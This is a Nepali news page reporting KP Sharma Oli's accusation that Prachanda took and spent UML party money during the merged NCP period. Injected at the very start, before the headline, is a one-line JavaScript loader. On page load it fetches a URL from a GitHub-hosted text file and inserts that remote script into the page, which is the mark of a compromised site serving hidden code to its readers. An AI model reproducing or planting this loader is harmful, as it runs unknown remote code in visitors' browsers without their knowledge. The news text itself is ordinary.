;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ओलीको आरोप : प्रचण्डले एमालेको रकम खाए पिए, सबै गरे – जुनेली न्युज
मङ्लबार, बैशाख ३, २०८२
  • होमपेज
  • ओलीको आरोप : प्रचण्डले एमालेको रकम खाए पिए, सबै गरे
Breaking News

ओलीको आरोप : प्रचण्डले एमालेको रकम खाए पिए, सबै गरे

१२ साउन, काठमाडौं ।

नेकपा एमालेका अध्यक्ष केपी शर्मा ओलीले नेकपा माओवादी केन्द्रसँग पार्टी एकता हुनै नसकेको बताएका छन् ।

जनसंगठन संमन्वय संयत्रको बैठकमा ओलीले पार्टी एकता प्रचण्डको चाहना नै नरहेको बताए ।

‘माओवादीसँग एकता भनिए पनि एकता हुँदै भएन’ ओलीले भने, ‘हामीले छुट्टै भेला गरेनौं । प्रचण्डले आफ्नो पार्टी जिवितै राखे । बैठक गरे ।’

तत्कालीन नेपाल कम्युनिष्ट पार्टी (नेकपा) हुँदा एमालेकै रकममा प्रचण्ड चलेको पनि ओलीले आरोप लगाए ।

‘आफ्नो हिसाबकिताब बुझाएनन्, रकम बुझाएनन् । एमालेको रकम लिए, एमालेको रकममा चले, एमालेको रुकम खाए, पिए, सबै गरे’ ओलीले भने ।

प्रचण्डले माओवादीको पार्टी कार्यालय समेत जिवितै राखेको ओलीको भनाइ थियो ।

पार्टी कब्जा गर्न नसके फेरि अलग हुनुपर्ने बुझेर प्रचण्डले हिसाबकिताब र पार्टी कार्यालय अलग गरेको ओलीले बताए ।

फेसबुक प्रतिक्रियाहरु